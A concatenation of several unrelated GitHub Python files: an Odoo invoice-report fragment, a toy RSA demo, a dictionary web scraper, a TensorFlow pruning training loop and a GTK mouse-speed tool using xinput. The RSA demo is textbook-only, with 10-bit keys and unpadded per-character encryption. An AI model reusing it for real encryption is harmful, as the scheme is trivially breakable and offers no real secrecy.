'ordered_products_number_of_bags':ordered_products_number_of_bags,\n 'ordered_products_quantity':ordered_products_quantity,\n 'ordered_products_price_of_unit':ordered_products_price_of_unit,\n 'ordered_products_amount': ordered_products_amount,\n 'ordered_products_total_quantity': \"{:,}\".format(ordered_products_total_quantity),\n 'ordered_products_total_amount': \"{:,}\".format(ordered_products_total_amount),\n 'ordered_products_total_amount_in_word':ordered_products_total_amount_in_word,\n 'currency_symbol_name':currency_symbol.name,\n 'currency_symbol_name1':currency_symbol.name,\n 'currency_symbol_name2':currency_symbol.name,\n 'currency_symbol':currency_symbol.symbol,\n 'currency_symbol1':currency_symbol.symbol,\n 'currency_symbol2':currency_symbol.symbol, \n 'delivery_order_num':do_no, \n 'delivery_order_created_date':delivery_order_date, \n }}\n else:\n res={} \n return res \n\n def split_order_date_read(self,order_date_read):\n seen = set()\n date= []\n answer = []\n for r in order_date_read: \n date.append(r['date'])\n combine_date = '\\n'.join([str(i) for i in date])\n for line in combine_date.splitlines():\n if line not in seen:\n seen.add(line)\n answer.append(line)\n combine = '\\n'.join(answer)\n return combine\n\n def split_do_no(self,do_no_read):\n seen = set()\n do= []\n answer = []\n for r in do_no_read: \n do.append(r['do_no'])\n combine_do = '\\n'.join([str(i) for i in do])\n for line in combine_do.splitlines():\n if line not in seen:\n seen.add(line)\n answer.append(line)\n combine = '\\n'.join(answer)\n return combine \n\n def split_products_names(self,invoice_lines_product_name):\n seen = set()\n answer = []\n names= []\n for r in invoice_lines_product_name:\n names.append(r['name'])\n combine_names = '\\n'.join([str(i) for i in names])\n for line in combine_names.splitlines():\n if line not in seen:\n seen.add(line)\n answer.append(line)\n combine = '\\n'.join(answer)\n return combine \n\n def split_products_number_of_bags(self,invoice_lines_product_quantity,num_of_bags):\n number_of_bags= []\n bags = int(num_of_bags)\n testListDict = {}\n for item in invoice_lines_product_quantity:\n try:\n d=item['name']\n testListDict[d] += int(item['quantity'] / bags)\n except:\n d=item['name']\n testListDict[d] = int(item['quantity'] / bags)\n \n for the_key, the_value in testListDict.iteritems():\n number_of_bags.append(the_value)\n combine = '\\n \\n'.join([str(i) for i in number_of_bags])\n return combine \n\n def split_products_quantity(self,invoice_lines_product_quantity):\n quantity= []\n testListDict = {}\n for item in invoice_lines_product_quantity:\n try:\n d=item['name']\n testListDict[d] += int(item['quantity']) \n except:\n d=item['name']\n testListDict[d] = int(item['quantity'])\n\n for the_key, the_value in testListDict.iteritems():\n quantity.append(the_value)\n combine = '\\n \\n'.join([str(i) for i in quantity])\n return combine \n\n def split_products_price_of_unit(self,invoice_lines_product_price_of_unit):\n price_of_unit= []\n testListDict = {}\n for item in invoice_lines_product_price_of_unit:\n try:\n d=item['name']\n testListDict[d] = item['price_unit'] \n except:\n d=item['name']\n testListDict[d] = item['price_unit']\n\n for the_key, the_value in testListDict.iteritems():\n price_of_unit.append(the_value)\n combine = '\\n \\n'.join([str(i) for i in price_of_unit])\n return combine\n\n def split_products_amount(self,invoice_lines_product_amount):\n amount= []\n testListDict = {}\n for item in invoice_lines_product_amount:\n try:\n d=item['name']\n 
testListDict[d] += int(item['price_subtotal']) \n except:\n d=item['name']\n testListDict[d] = int(item['price_subtotal'])\n\n for the_key, the_value in testListDict.iteritems():\n amount.append(the_value)\n combine = '\\n \\n'.join([str(i) for i in amount])\n return combine \n\n def products_total_quantity(self,invoice_lines_product_quantity):\n total_quantity= []\n for r in invoice_lines_product_quantity: \n total_quantity.append(r['quantity'])\n in_com = sum(total_quantity)\n combine = int(in_com)\n return combine \n\n def products_total_amount(self,invoice_lines_product_amount):\n total_amount= []\n idx = 0\n for r in invoice_lines_product_amount:\n total_amount.append(r['price_subtotal'])\n combine = sum(total_amount)\n return combine\n\n def onchange_client_shipping_factory_name(self, cr, uid, ids, client_shipping_factory_name=False, context=None):\n res= {}\n if client_shipping_factory_name:\n service_obj= self.pool.get('customer_factory_name_address.model')\n rec = service_obj.browse(cr, uid, client_shipping_factory_name)\n res = {'value':{\n 'client_shipping_factory_address':rec.address,\n 'destination_address':rec.address\n }}\n else:\n res={} \n return res\n\n def onchange_supplier_factory_name(self, cr, uid, ids, supplier_factory_name=False, context=None):\n res= {}\n if supplier_factory_name:\n service_obj= self.pool.get('supplier_factory_name_address.model')\n rec = service_obj.browse(cr, uid, supplier_factory_name)\n res = {'value':{\n 'supplier_factory_address':rec.address\n }}\n else:\n res={} \n return res\n\n def numToWords(self,num,join=True):\n '''words = {} convert an integer number into words'''\n units = ['','one','two','three','four','five','six','seven','eight','nine']\n teens = ['','eleven','twelve','thirteen','fourteen','fifteen','sixteen', \\\n 'seventeen','eighteen','nineteen']\n tens = ['','ten','twenty','thirty','forty','fifty','sixty','seventy', \\\n 'eighty','ninety']\n thousands = ['','thousand','million','billion','trillion','quadrillion', \\\n 'quintillion','sextillion','septillion','octillion', \\\n 'nonillion','decillion','undecillion','duodecillion', \\\n 'tredecillion','quattuordecillion','sexdecillion', \\\n 'septendecillion','octodecillion','novemdecillion', \\\n 'vigintillion']\n words = []\n if num==0: words.append('zero')\n else:\n numStr = '%d'%num\n numStrLen = len(numStr)\n groups = (numStrLen+2)/3\n numStr = numStr.zfill(groups*3)\n for i in range(0,groups*3,3):\n h,t,u = int(numStr[i]),int(numStr[i+1]),int(numStr[i+2])\n g = groups-(i/3+1)\n if h>=1:\n words.append(units[h])\n words.append('hundred')\n if t>1:\n words.append(tens[t])\n if u>=1: words.append(units[u])\n elif t==1:\n if u>=1: words.append(teens[u])\n else: words.append(tens[t])\n else:\n if u>=1: words.append(units[u])\n if (g>=1) and ((h+t+u)>0): words.append(thousands[g]+',')\n if join: return ' '.join(words)\n return words\n\n # def split_products_names(self,invoice_lines_product_name):\n # names= []\n # idx = 0\n # for r in invoice_lines_product_name:\n # names.append(r['name'])\n # combine = '\\n'.join([str(i) for i in names]) \n # return combine \n\n # def split_from_list(self,list_name,data_field):\n # save = []\n # for r in list_name:\n # save.append(r[data_field])\n # combine = '\\n'.join([str(i) for i in save])\n # return combine 
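\n\n # A worked example (sketch) for numToWords above: numToWords(215) returns\n # 'two hundred fifteen' and numToWords(0) returns 'zero'; the group suffixes\n # ('thousand', 'million', ...) come from the thousands list.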
\n\n\n\n\n\n\n\n","repo_name":"Arnavbd1971/lc_report_generator_odoo8_aahold","sub_path":"models/commercial_invoices.py","file_name":"commercial_invoices.py","file_ext":"py","file_size_in_byte":18554,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"31571694173","text":"import time\nfrom apa import LongA\nfrom math import gcd, ceil, sqrt, floor\nfrom random import randint, randrange\n\n\nclass RSA:\n def __init__(self, num_bits):\n self.input_message = str()\n self.num_bits = num_bits\n self.prime1 = 0\n self.prime2 = 0\n self.modul = 0\n self.public_keys = tuple()\n self.private_keys = tuple()\n\n def __genprime(self, k):\n x = \"\"\n k = int(k)\n for y in range(k):\n x = x + \"1\"\n y = \"1\"\n for z in range(k-1):\n y = y + \"0\"\n x = int(x,2)\n y = int(y,2)\n p = 0\n while True:\n p = randrange(y,x)\n if self.__rabin_miller(p):\n break\n return p\n\n def gen_private_keys(self):\n # d must be the inverse of e modulo lambda(N) (saved by get_public_keys), not modulo N\n gdc, x, d = self.__gcdExtended(self.lam, self.public_keys[1])\n self.private_keys = (self.public_keys[0], d % self.lam)\n\n def get_public_keys(self):\n e = 65537\n while True:\n self.prime1 = self.__genprime(self.num_bits//2)\n if self.prime1 % e != 1:\n break\n \n while True:\n self.prime2 = self.__genprime(self.num_bits//2)\n if self.prime2 % e != 1:\n break\n\n N = self.prime1*self.prime2\n \n lam = self.__carmichael(int(N))\n self.lam = lam # kept so gen_private_keys can invert e modulo lambda(N)\n\n if gcd(e, lam) == 1:\n self.public_keys = (N, e)\n else: \n e_test = 0\n while True:\n e_test = randint(2, lam)\n if e_test % 2 == 0:\n continue\n else:\n if self.__rabin_miller(e_test):\n if gcd(e_test, lam) == 1:\n break \n \n e = e_test\n self.public_keys = (N, e)\n\n def __gcdExtended(self, a, b): \n if a == 0 : \n return b,0,1\n \n gcd, x1, y1 = self.__gcdExtended(b%a, a) \n \n x = y1 - (b//a) * x1 \n y = x1 \n \n return gcd, x, y\n\n def __rabin_miller(self, p):\n if(p < 2):\n return False\n if p != 2 and p % 2 == 0:\n return False\n s = p - 1\n t = 0\n while(s % 2 == 0):\n s >>= 1\n t += 1\n\n for i in range(20):\n a = randint(2, p - 2)\n #a_temp = int(a)\n #s_temp = int(s)\n #p_temp = int(p)\n #b = LongA.to_number(pow(a_temp, s_temp, p_temp))\n b = pow(a, s, p)\n if b == 1 or b == p - 1:\n continue\n for i in range(t):\n b = (b * b) % p\n\n if b == 1:\n return False\n if b == p - 1:\n break\n\n return True\n\n def __carmichael(self, n: int):\n n=int(n)\n k=2\n a=1\n alist=[]\n\n while not ((gcd(a,n))==1):\n a=a+1\n\n while ((gcd(a,n))==1) & (a<=n) :\n alist.append(a)\n a=a+1\n while not ((gcd(a,n))==1):\n a=a+1\n\n timer=len(alist)\n while timer>=0:\n for a in alist:\n if (a**k)%n==1:\n timer=timer-1\n if timer <0:\n break\n pass\n else:\n timer=len(alist)\n k=k+1\n return k\n\n def encode(self, message: str):\n words = message.split()\n encrypted = []\n for word in words:\n encrypted_word = []\n for c in word:\n c_ascii = ord(c)\n # c = m**e mod N: the exponent is e (index 1), the modulus is N (index 0)\n c_cypher = pow(c_ascii, self.public_keys[1], self.public_keys[0])\n encrypted_word.append(c_cypher)\n encrypted.append(encrypted_word)\n\n return encrypted\n\n\n def decode(self, message):\n decoded_words = []\n for word in message:\n decoded_word = \"\"\n for cypher in word:\n m = pow(cypher, self.private_keys[1], self.private_keys[0])\n decoded_word = decoded_word + chr(m)\n decoded_words.append(decoded_word)\n # rejoin with spaces, which encode() discarded via split()\n return ' '.join(decoded_words)\n\nclass Bob:\n def __init__(self, message, public_keys = None):\n self.message = message\n self.public_keys = public_keys\n self.RSA = RSA(10)\n self.RSA.input_message = self.message\n \n def code_messages(self):\n 
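# A minimal sketch of the math this class relies on (public_keys = (N, e),\n # private_keys = (N, d)): each character ch is enciphered as c = pow(ord(ch), e, N)\n # and later deciphered as chr(pow(c, d, N)).\n 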
self.RSA.public_keys = self.public_keys\n self.message = self.RSA.encode(self.message)\n \nclass Alice:\n def __init__(self):\n self.message = None\n self.public_keys = list()\n self.private_keys = list()\n self.RSA = RSA(10)\n\n def create_keys(self):\n self.RSA.get_public_keys()\n self.public_keys = self.RSA.public_keys\n \n def decode_message(self):\n self.RSA.input_message = self.message\n self.RSA.gen_private_keys()\n self.private_keys = self.RSA.private_keys\n print(f\"Private keys: {self.private_keys}\")\n self.message = self.RSA.decode(self.message)\n \n\"\"\"\ndef rabin_miller(p):\n if(p < 2):\n return False\n if p != 2 and p % 2 == 0:\n return False\n s = p - 1\n t = 0\n while(s % 2 == 0):\n s >>= 1\n t += 1\n\n for i in range(20):\n a = randint(2, p - 2)\n a_temp = int(a)\n s_temp = int(s)\n p_temp = int(p)\n b = LongA.to_number(pow(a_temp, s_temp, p_temp))\n #b = LongA.pow(a, s, p)\n if b == 1 or b == p - 1:\n continue\n for i in range(t):\n b = (b * b) % p\n\n if b == 1:\n return False\n if b == p - 1:\n break\n\n return True\n\"\"\"\ndef miller_rabin(n):\n\n if n == 2 or n == 3:\n return True\n\n if n % 2 == 0:\n return False\n\n r = 0\n s = n - 1\n while s % 2 == 0:\n r += 1\n s //= 2\n for _ in range(10):\n a = randrange(2, n - 1)\n a_temp = int(a)\n s_temp = int(s)\n p_temp = int(n)\n x = LongA.to_number(pow(a_temp, s_temp, p_temp))\n #x = pow(a, s, n)\n if x == 1 or x == n - 1:\n continue\n for _ in range(r - 1):\n a_temp = int(x)\n s_temp = int(s)\n p_temp = int(n)\n x = LongA.to_number(pow(a_temp, 2, p_temp))\n #x = pow(x, 2, n)\n if x == n - 1:\n break\n else:\n return False\n return True\n\n\ndef genprimeBits(k):\n x = \"\"\n k = int(k)\n for y in range(k):\n x = x + \"1\"\n y = \"1\"\n for z in range(k-1):\n y = y + \"0\"\n x = int(x,2)\n y = int(y,2)\n p = 0\n while True:\n p = randrange(y,x)\n p = LongA(str(p))\n if miller_rabin(p):\n break\n return p\n \n\n#inp = input(\"Long number: \")\n#inp = LongA(inp)\n#print(f\"is prime: {rabin_miller(inp)}\")\n#print(f\"is prime: {miller_rabin(inp)}\")\n#inp = input(\"Number of bits: \")\n#inp = LongA(inp)\n#ans = genprimeBits(inp)\n#print(f\"rand prime number with {inp} bits: {ans}\")\n#print(f\"ans as binary {ans.as_binary()}\")\n#print(f\"ans as base64 {ans.as_base64()}\")\n#print(f\"ans as bytes object {ans.as_bytes()}\")\n\nMESSAGE:str = \"HELLO\"\nBob = Bob(MESSAGE)\nAlice = Alice()\nAlice.create_keys()\nprint(f\"Public keys {Alice.public_keys}\")\nBob.public_keys = Alice.public_keys\nBob.code_messages()\nprint(f\"{MESSAGE} is now Encoded message {Bob.message}\")\nAlice.message = Bob.message\nAlice.decode_message()\nprint(f\"message decoded by Alice: {Alice.message}\")\n","repo_name":"MaksymRud/cryptography","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":7563,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"13057833649","text":"import requests\r\n\r\nfrom bs4 import BeautifulSoup\r\n\r\ndef word(soup):\r\n # helper takes the parsed page explicitly; there is no global soup object\r\n qq = soup.find('span', {'class': 'word'})\r\n ww = qq.string\r\n print(ww)\r\n\r\ndef vocab():\r\n url=\"https://www.vocabulary.com/dictionary/abst\"\r\n\r\n page = requests.get(url).text\r\n soup=BeautifulSoup(page , \"html.parser\")\r\n qqq=soup.findAll(\"div\",{\"class\" : \"autocomplete\"})\r\n qq=soup.find('span', {'class' : 'word'})\r\n ww=qq.string\r\n print(ww)\r\n '''for item in qqq:\r\n if \"word\" :\r\n print (item.attr)'''\r\n '''inputTag = soup.find(attrs={\"name\": \"stainfo\"})\r\n output = 
inputTag['value']'''\r\n # qq=qqq['word']\r\n # print(qqq)\r\n # eee=soup.findAll(\"div\",{\"class\":\"centeredContent\"})\r\n fff=soup.findAll(\"p\", {\"class\":\"short\"})\r\n print(fff)\r\n\r\n ggg=soup.findAll(\"p\", {\"class\": \"long\"})\r\n print(ggg)\r\nvocab()\r\n\r\n\r\n #class section blurb\r\n #and long\r\n\r\n # class didyoumean (skip)","repo_name":"nishanth-bs/Vocab","sub_path":"1.py","file_name":"1.py","file_ext":"py","file_size_in_byte":912,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"15549066945","text":"import os\nimport tensorflow as tf\nimport time\nimport numpy as np\nimport sys\nPATH = os.getcwd()\nsys.path.insert(1, PATH)\nimport augment\n\n\ndef train(args, model, sess, dataset,sp_bool):\n print('|========= START TRAINING =========|')\n tf.set_random_seed(args.seed)\n np.random.seed(args.seed)\n if not os.path.isdir(args.path_summary): os.makedirs(args.path_summary)\n if not os.path.isdir(args.path_model): os.makedirs(args.path_model)\n saver = tf.train.Saver()\n random_state = np.random.RandomState(args.seed)\n writer = {}\n writer['train'] = tf.summary.FileWriter(args.path_summary + '/train', sess.graph)\n writer['val'] = tf.summary.FileWriter(args.path_summary + '/val')\n t_start = time.time()\n check_convergence=[]\n convergence = False\n iters = args.train_iterations_sp if sp_bool else args.train_iterations\n for itr in range(iters):\n if convergence:\n break\n batch = dataset.get_next_batch('train', args.batch_size)\n batch = augment.augment(batch, args.aug_kinds, random_state)\n feed_dict = {}\n feed_dict.update({model.inputs[key]: batch[key] for key in ['input', 'label']})\n feed_dict.update({model.compress: False, model.is_train: True, model.pruned: True, model.sp: sp_bool})\n input_tensors = [model.outputs] # always execute the graph outputs\n if (itr+1) % args.check_interval == 0:\n input_tensors.extend([model.summ_op, model.sparsity])\n input_tensors.extend([model.train_op])\n result = sess.run(input_tensors, feed_dict)\n\n # Check on validation set.\n if (itr+1) % args.check_interval==0:\n batch = dataset.get_next_batch('val', args.batch_size)\n batch = augment.augment(batch, args.aug_kinds, random_state)\n feed_dict = {}\n feed_dict.update({model.inputs[key]: batch[key] for key in ['input', 'label']})\n feed_dict.update({model.compress: False, model.is_train: False, model.pruned: True, model.sp: sp_bool})\n input_tensors = [model.outputs, model.summ_op, model.sparsity]\n result_val = sess.run(input_tensors, feed_dict)\n check_convergence.append(result_val[0]['los'])\n # Check whether the model has converged; if it has, training stops\n if len(check_convergence)>20:\n if min(check_convergence[-20:])>min(check_convergence[:-20]):\n convergence = True\n\n # Check summary and print results\n if (itr+1) % args.check_interval == 0:\n writer['train'].add_summary(result[1], itr)\n writer['val'].add_summary(result_val[1], itr)\n pstr = '(train/val) los:{:.3f}/{:.3f} acc:{:.3f}/{:.3f} spa:{:.3f}'.format(\n result[0]['los'], result_val[0]['los'],\n result[0]['acc'], result_val[0]['acc'],\n result[2],\n )\n print('itr{}: {} (t:{:.1f})'.format(itr+1, pstr, time.time() - t_start))\n t_start = time.time()\n\n # Save model\n if (itr+1) % args.save_interval == 0:\n saver.save(sess, args.path_model + '/itr-' + 
str(itr))\n","repo_name":"jbpuype/SNIP-SP","sub_path":"snip-sp/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":3177,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"15549066945","text":"#!python3\n\nimport gi\ngi.require_version('Gtk', '3.0')\nfrom gi.repository import Gtk, Gdk, Gio\n\nimport subprocess\nimport os\nimport time\n\nhome = os.environ[\"HOME\"] + '/'\nos.chdir(home)\nif os.path.isdir(\".mouse_config\") == False:\n\tos.mkdir(\".mouse_config\") \n\tos.chdir(\".mouse_config\")\nelse:\n\tos.chdir(home+'.mouse_config')\n\nlicense = subprocess.run(['python', 'license.py'], stdout=subprocess.PIPE).stdout.decode('utf-8')\n\n\t\t\t\t\n\t\t\nclass mouse_config(Gtk.Window):\n\tdef __init__(self):\n \n\t\tGtk.Window.__init__(self, title=\"Mouse Config\")\n\t\tself.set_position(Gtk.WindowPosition.CENTER)\n\t\tself.set_border_width(10)\n\t\t\n\t\theaderBar = Gtk.HeaderBar()\n\t\theaderBar.set_show_close_button(True)\n\t\theaderBar.props.title = 'Velocity'\n\t\tself.set_titlebar(headerBar)\n\t\t\n\t\tabout_button = Gtk.Button()\n\t\ticon = Gio.ThemedIcon(name='help-about-symbolic')\n\t\timage = Gtk.Image.new_from_gicon(icon, Gtk.IconSize.BUTTON)\n\t\tabout_button.add(image)\n\t\tabout_button.connect('clicked', self.about_btn_activate)\n\t\theaderBar.pack_start(about_button)\n \n\t\tglobal mouseCombo\n\t\tmouseCombo = Gtk.ComboBoxText()\n\t\tmouseCombo.connect(\"changed\", self.mouse_selected)\n\t\tmouseCombo.set_size_request(360, 30)\n\t\t\n\t\taccel_label = Gtk.Label()\n\t\taccel_label.set_markup(\"Acceleration\")\n\t\t\n\t\tadjustment = Gtk.Adjustment(value=0,\n \t\t\t\t\t\t\tlower=0,\n \t\t\t\t\t\t\tupper=100,\n \t\t\t\t\t\t\tstep_increment=1,\n \t\t\t\t\t\t\tpage_increment=5,\n \t\t\t\t\t\t\tpage_size=0)\n\t\tself.accel_spin = Gtk.SpinButton()\n\t\tself.accel_spin.set_adjustment(adjustment)\n\t\tself.accel_value = self.accel_spin.get_value()\n\t\tself.accel_value = int(self.accel_value)\n\t\tself.accel_spin.connect(\"value-changed\", self.accel_spin_changed)\n\t\t\n\t\tdecel_label = Gtk.Label()\n\t\tdecel_label.set_markup(\"Deceleration\")\n \n\t\tadjustment = Gtk.Adjustment(value=0,\n \t\t\t\t\t\t\tlower=0,\n \t\t\t\t\t\t\tupper=100,\n \t\t\t\t\t\t\tstep_increment=1,\n \t\t\t\t\t\t\tpage_increment=5,\n \t\t\t\t\t\t\tpage_size=0)\n\t\tself.decel_spin = Gtk.SpinButton()\n\t\tself.decel_spin.set_adjustment(adjustment)\n\t\tself.decel_value = self.decel_spin.get_value()\n\t\tself.decel_spin.connect('value-changed', self.decel_spin_changed)\n\t\t\n\t\tself.startup_Button = Gtk.Button(label=\"Run on Startup?\")\n\t\tself.startup_Button.connect('clicked', self.startup_clicked)\n\t\t\n\t\tgrid = Gtk.Grid()\t\n\t\t\n\t\tlistBox = Gtk.ListBox()\n\t\tempty_label = Gtk.Label()\n\t\t\n\t\trow1 = Gtk.ListBoxRow()\n\t\thbox1 = Gtk.Box(orientation=Gtk.Orientation.HORIZONTAL, spacing=140)\n\t\thbox1.pack_start(accel_label, True, True, 0)\n\t\thbox1.pack_start(self.accel_spin, False, True, 0)\n\t\trow1.add(hbox1)\n\t\tlistBox.add(row1)\n\t\t\n\t\trow2 = Gtk.ListBoxRow()\n\t\thbox2 = Gtk.Box(orientation=Gtk.Orientation.HORIZONTAL, spacing=140)\n\t\thbox2.pack_start(decel_label, True, True, 0)\n\t\thbox2.pack_start(self.decel_spin, False, True, 0)\n\t\trow2.add(hbox2)\n\t\tlistBox.add(row2)\t\n\t\t\n\t\trow3 = Gtk.ListBoxRow()\n\t\thbox3 = Gtk.Box(orientation=Gtk.Orientation.HORIZONTAL)\n\t\tempty_label1 = Gtk.Label()\n\t\thbox3.pack_start(empty_label1, True, True, 
0)\n\t\trow3.add(hbox3)\n\t\tlistBox.add(row3)\n\t\t\n\t\trow4 = Gtk.ListBoxRow()\n\t\thbox4 = Gtk.Box(orientation=Gtk.Orientation.HORIZONTAL)\n\t\thbox4.pack_start(self.startup_Button, True, True, 0)\n\t\trow4.add(hbox4)\n\t\tlistBox.add(row4)\n\t\t\n\n\t\tgrid.add(mouseCombo)\n\t\tgrid.attach(empty_label, 0, 2, 1, 1)\n\t\tgrid.attach(listBox, 0, 4, 1, 2)\n\t\tself.add(grid)\n\t\n\t\t\n\t\t#####################################################################################################################\n\t\t#####################################################################################################################\n\t\t\n\t\txinput_output = subprocess.run(['xinput','--list'], stdout=subprocess.PIPE).stdout.decode('utf-8')\t\n\t\t\n\t\t# create file '.pointers'\n\t\tif os.path.isfile('.pointers'):\n\t\t\tprint('overwriting..')\n\t\t\tos.system('rm -rf .pointers')\n\t\t\tos.system('touch .pointers')\n\t\telse:\n\t\t\tos.system('touch .pointers')\n\t\t\t\n\t\t# counters\n\t\tcounter=0\n\t\tposition=0\t# changes after first loop to counter - \n\t\t\t\t\t# for each successful 'if' clause position is value of all characters to remove \n\t\t\t\t\t# from start of variable 'x'\t\t\n\t\tctr=0\t\n\t\tfor i in xinput_output:\t\n\t\t\tif i in ']': # ']' is close to end of line\n\t\t\t\tx = len(xinput_output) - (counter)\n\t\t\t\tx = xinput_output[:-x] # remove from end to after ']' \n\t\t\t\tx = x[position:] # slice first item in string\n\t\t\t\tx = x[7:] # removes '⎜ ↳' from the start\n\t\t\t\t\n\t\t\t\twith open('.pointers', 'a') as f:\n\t\t\t\t\tf.write('{}\\n'.format(x))\n\t\t\t\t\n\t\t\t\tposition = counter \n\t\t\t\tctr+=1\n\t\t\tcounter+=1\n\t\t\n\t\t# search for pointer, trim whitespace and get id of device in 'line'\n\t\tself.p_names = [] # to hold pointer names\n\t\tself.p_ids = [] # to hold pointer ids\n\t\tself.name_id = {} # dictionary to hold 'name':id\n\t\tctr1=0\n\t\twith open('.pointers', 'r') as f:\n\t\t\tfor line in f:\n\t\t\t\tif 'slave pointer' in line:\n\t\t\t\t\tctr=0\n\t\t\t\t\tfor item in line: \n\t\t\t\t\t\t# find id\n\t\t\t\t\t\tif item in '=': # '=' is followed by the id\n\t\t\t\t\t\t\tif self.confirm_id(ctr, line):\n\t\t\t\t\t\t\t\tprint('\\tPointer id -- {}\\n\\n\\n'.format(self.p_ids))\n\t\t\t\t\t\t\tself.trim_whitespace(ctr, line)\n\t\t\t\t\t\t\t# add name and id to dict 'self.name_id'\n\t\t\t\t\t\t\tself.name_id[self.p_names[ctr1]] = self.p_ids[ctr1]\n\t\t\t\t\t\t\tprint(ctr1)\n\t\t\t\t\t\t\tprint(self.name_id)\n\t\t\t\t\t\t\tctr1+=1\n\t\t\t\t\t\tctr+=1\n\t\t\t\t\t\t\n\t\t########################################################\n\t\tfor device in self.p_names:\n\t\t\tmouseCombo.append_text(device)\n\t\t########################################################\n\t\t\t\t\n \n\tdef mouse_selected(self, mouseCombo):\n\t\t# i really don't know why this is working\n\t\tself.chosen = mouseCombo.get_active_text()\n\t\tfor k,v in self.name_id.items()\t:\n\t\t\tif self.chosen == k:\n\t\t\t\t\tself.id = v\n\t\tlist_prop = subprocess.run(['xinput', 'list-props', str(self.id)], stdout=subprocess.PIPE).stdout.decode('utf-8')\n\n\t\twith open('.list_props', 'w') as f:\n\t\t\tf.write(list_prop)\n\t\t\n\t\t# search for property id in .list_props which contains the output of 'xinput list-props device_id'\n\t\tctr4=0\n\t\twith open('.list_props', 'r') as f:\n\t\t\tfor line in f:\n\t\t\t\tif 'Accel Constant Deceleration' in line:\n\t\t\t\t\tctr=0\n\t\t\t\t\tprint(line)\n\t\t\t\t\tfor i in line:\n\t\t\t\t\t\tif '(' in i:\n\t\t\t\t\t\t\tctr1=0\n\t\t\t\t\t\t\tfor a in 
line:\n\t\t\t\t\t\t\t\tif ctr1 == (ctr+1):\n\t\t\t\t\t\t\t\t\tif a.isdigit():\n\t\t\t\t\t\t\t\t\t\tself.property = int(a)\n\t\t\t\t\t\t\t\t\t\tctr2=0\n\t\t\t\t\t\t\t\t\t\tfor b in line:\n\t\t\t\t\t\t\t\t\t\t\tif ctr2 == (ctr+2):\n\t\t\t\t\t\t\t\t\t\t\t\tif b.isdigit():\n\t\t\t\t\t\t\t\t\t\t\t\t\tself.property = (self.property * 10) + int(b)\n\t\t\t\t\t\t\t\t\t\t\t\t\tctr3=0\n\t\t\t\t\t\t\t\t\t\t\t\t\tfor c in line:\n\t\t\t\t\t\t\t\t\t\t\t\t\t\tif ctr3 == (ctr+3):\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tif c.isdigit():\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tself.property = (self.property * 10) + int(c)\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tself.prop_id = self.property\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tprint('Property id: {}'.format(self.prop_id))\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t\t\t\t\t\t\t\tctr3+=1\n\t\t\t\t\t\t\t\t\t\t\tctr2+=1\n\t\t\t\t\t\t\t\tctr1+=1\n\t\t\t\t\t\tctr+=1\n\t\t\t\t\t\tctr4+=1\n\t\t\tif (ctr4 == 0):\n\t\t\t\ttime.sleep(0.5)\n\t\t\t\tdialog = Gtk.MessageDialog(self, 0, Gtk.MessageType.INFO,\n\t\t\t\t\tGtk.ButtonsType.OK, 'Deceleration mode not available!')\n\t\t\t\tdialog.format_secondary_text('Constant deceleration is not available for this device')\n\t\t\t\tdialog.run()\n\t\t\t\tdialog.destroy()\n \n \n\tdef accel_spin_changed(self, accel_spin):\n\t\tself.accel_value = self.accel_spin.get_value()\n\t\tself.accel_value = int(self.accel_value)\n\t\tprint(self.accel_value)\n\t\tos.system('xset m {}'.format(self.accel_value))\n\t\t\n\t\t\n\tdef decel_spin_changed(self, decel_spin):\n\t\tself.decel_value = self.decel_spin.get_value()\n\t\tif mouseCombo.get_active_text():\n\t\t\tos.system('xinput set-prop {} {} {}'.format(self.id, self.prop_id, self.decel_value))\n\t\telse:\n\t\t\tdialog = Gtk.MessageDialog(self, 0, Gtk.MessageType.ERROR,\n\t\t\t\tGtk.ButtonsType.OK, 'No device selected!')\n\t\t\tdialog.format_secondary_text('Select a device to change deceleration')\n\t\t\tdialog.run()\n\t\t\tdialog.destroy()\n\t\t\n\t\t\n\tdef trim_whitespace(self, index, cmd):\n\t\tto_trim = cmd[index:] \n\t\tlen_trim = len(to_trim)\n\t\tlen_trim = len_trim + 2 # remove 'id'\n\t\t\n\t\tself.p_name = cmd[:-len_trim]\n\t\t\n\t\t# remove whitespace at end of len_trim\n\t\t# discard whitespace between words so whitespace must be more than 1 item\n\t\tctr=0\n\t\tctr1=0\n\t\tfor i in self.p_name:\n\t\t\tif ' ' in i:\n\t\t\t\tfor a in self.p_name:\n\t\t\t\t\t# if iter in first loop is one less than current iter \n\t\t\t\t\tif ctr == (ctr1-1): \t\n\t\t\t\t\t\t# if second item is also whitespace\n\t\t\t\t\t\tif ' ' in a:\n\t\t\t\t\t\t\t# trim self.p_name of all items after first iter\n\t\t\t\t\t\t\tx = len(self.p_name) - ctr\n\t\t\t\t\t\t\tself.p_name = self.p_name[:-x]\n\t\t\t\t\tctr1+=1 \n\t\t\t\t\t\n\t\t\tctr+=1\n\t\tself.p_names.append(self.p_name)\n\t\t\t\t \n\t\t\t\t\n\tdef confirm_id(self, index, cmd):\n\t\tself.cmd = cmd[index:]\n\t\tfor a in self.cmd:\n\t\t\tif (a in '='):\n\t\t\t\tself.cmd = self.cmd[1:]\n\t\t\t\tfor b in self.cmd:\n\t\t\t\t\tif b.isdigit():\n\t\t\t\t\t\tself.p_id = b\n\t\t\t\t\t\tself.p_id = int(self.p_id)\n\t\t\t\t\t\tself.cmd = self.cmd[1:]\n\t\t\t\t\t\tfor c in self.cmd:\n\t\t\t\t\t\t\tif c.isdigit():\n\t\t\t\t\t\t\t\tself.p_id = (self.p_id * 10) + int(c)\n\t\t\t\t\t\t\t\tself.p_ids.append(self.p_id)\n\t\t\t\t\t\t\t\treturn True\n\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\tself.p_ids.append(self.p_id)\n\t\t\t\t\t\t\t\treturn 